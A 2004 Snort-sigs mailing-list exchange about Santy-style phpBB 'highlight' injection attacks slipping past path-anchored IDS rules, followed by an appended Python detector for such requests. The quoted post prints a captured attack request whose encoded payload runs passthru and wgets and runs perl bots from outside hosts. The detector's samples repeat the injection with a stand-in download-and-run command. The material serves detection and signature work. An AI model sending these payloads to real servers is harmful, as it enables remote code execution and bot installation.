[Snort-sigs] Santy (sort of) doesn't trigger any rule

M. Shirk shirkdog_list at ...12...
Thu Dec 30 06:05:01 EST 2004


The bleedingsnort sigs are looking for viewtopic.php in the URI, followed by 
the highlight vulnerability. So if viewtopic.php is not in the URI, then the 
sigs will not trigger. If you wanted to alert on this traffic, you might 
want to edit the BLEEDING EDGE rules and take out the following rule option:

uricontent:"/viewtopic.php?";


Shirkdog
http://www.shirkdog.us



>From: Guy Marcenac <guy.marc at ...2146...>
>To: snort-sigs at lists.sourceforge.net
>Subject: [Snort-sigs] Santy (sort of) doesn't trigger any rule
>Date: Thu, 30 Dec 2004 11:43:51 +0100
>
>Hello,
>
>I'm getting an increasing number of attacks that look like Santy. But they never 
>trigger any of the rules I use (official Snort set 2.2 and Bleeding Snort 
>set, updated every night).
>
>There are seven different patterns (the most frequent is attached below). 
>The attacks come from lots of different IPs, which seem to have a web server 
>running.
>They try to use an existing webalizer HTML page (which itself contains 
>references to a viewtopic.php file). Of course, it fails.
>
>I'm not sure whether this could really do harm if used against a real PHP page, but I 
>think so.
>
>I can post a complete sample of these attacks if needed.
>
>GET 
>/webalizer/usage_200407.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
>
>--
>guy
>
>
>_______________________________________________
>Snort-sigs mailing list
>Snort-sigs at lists.sourceforge.net
>https://lists.sourceforge.net/lists/listinfo/snort-sigs
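Added example (not from either poster and not the Bleeding Snort rule text): a small Python checker that shows why a signature gated on /viewtopic.php? misses Guy's sample and what a path-independent check looks like. It finds the highlight= parameter by regex rather than a query-string parser (the quoted request has no "?" at all, the parameters are appended straight onto a static .html path), decodes repeatedly because the quote arrives double-encoded as %2527, and then follows the injected passthru() call back to the GET parameter that carries the shell command. The highlight payload below is the one quoted in the thread; the rush command and the hostname are shortened stand-ins, and the detection functions are mine, not Snort's.

```python
import re
from urllib.parse import unquote

# Marker the reply says the Bleeding Snort rules key on.
VIEWTOPIC_MARKER = "/viewtopic.php?"

# highlight= found with a regex, not a query-string parser: the request in
# the thread has no '?' at all, it appends '&rush=...&highlight=...' straight
# onto a static .html path.
HIGHLIGHT_RE = re.compile(r"(?:^|[?&;])highlight=([^&\s]*)", re.I)

# After decoding, the Santy payload breaks out of the PHP string with a quote
# and calls a code-execution function on a second GET parameter:
#   '.passthru($HTTP_GET_VARS[rush]).'
EXEC_FUNCS = ("passthru", "system", "exec", "shell_exec", "popen")
INJECT_RE = re.compile(r"""['"]\s*\.\s*(?:%s)\s*\(""" % "|".join(EXEC_FUNCS), re.I)
VAR_RE = re.compile(r"\$(?:HTTP_GET_VARS|_GET)\[\s*['\"]?(\w+)['\"]?\s*\]")


def full_decode(s, max_rounds=3):
    """Undo stacked percent-encoding: Santy sends the quote as %2527,
    which is %27 after one pass and ' after two."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def param_value(uri, name):
    """Raw (still encoded) value of a GET parameter, wherever it sits."""
    m = re.search(r"(?:^|[?&;])%s=([^&\s]*)" % re.escape(name), uri, re.I)
    return m.group(1) if m else None


def highlight_injection(uri):
    """Path-independent check. Returns the decoded highlight payload when it
    contains a string-break followed by an exec call, else None."""
    for m in HIGHLIGHT_RE.finditer(uri):
        decoded = full_decode(m.group(1))
        if INJECT_RE.search(decoded):
            return decoded
    return None


def path_anchored_match(uri):
    """Same payload check, but gated on /viewtopic.php? the way the reply
    describes the Bleeding rules: misses the webalizer variant entirely."""
    return VIEWTOPIC_MARKER in uri and highlight_injection(uri) is not None


def carried_command(uri):
    """Follow the injected call back to the GET parameter it executes and
    decode it, so the alert shows the shell command rather than hex."""
    payload = highlight_injection(uri)
    if payload is None:
        return None
    var = VAR_RE.search(payload)
    raw = param_value(uri, var.group(1)) if var else None
    return full_decode(raw) if raw is not None else None


def analyze(uri):
    return {
        "path_anchored": path_anchored_match(uri),
        "injection": highlight_injection(uri),
        "command": carried_command(uri),
    }


# Constructed samples. The highlight payload is the one quoted in the thread;
# the rush command and the hostname are shortened stand-ins.
HIGHLIGHT = ("%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54"
             "%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'")
RUSH = ("%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;"
        "wget%20http://bot.example/bot.htm;perl%20bot.htm")

SAMPLES = {
    "webalizer": "/webalizer/usage_200407.html&rush=%s&highlight=%s" % (RUSH, HIGHLIGHT),
    "phpbb": "/forum/viewtopic.php?t=1&rush=%s&highlight=%s" % (RUSH, HIGHLIGHT),
    "benign": "/forum/viewtopic.php?t=1&highlight=snort+rules",
}

if __name__ == "__main__":
    for name, uri in SAMPLES.items():
        print(name, analyze(uri))
```

Running it, the "webalizer" sample reports path_anchored False but still yields the decoded payload and the command it would run, which is the gap the reply describes; the "phpbb" sample trips both checks, and the benign highlight search trips neither.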
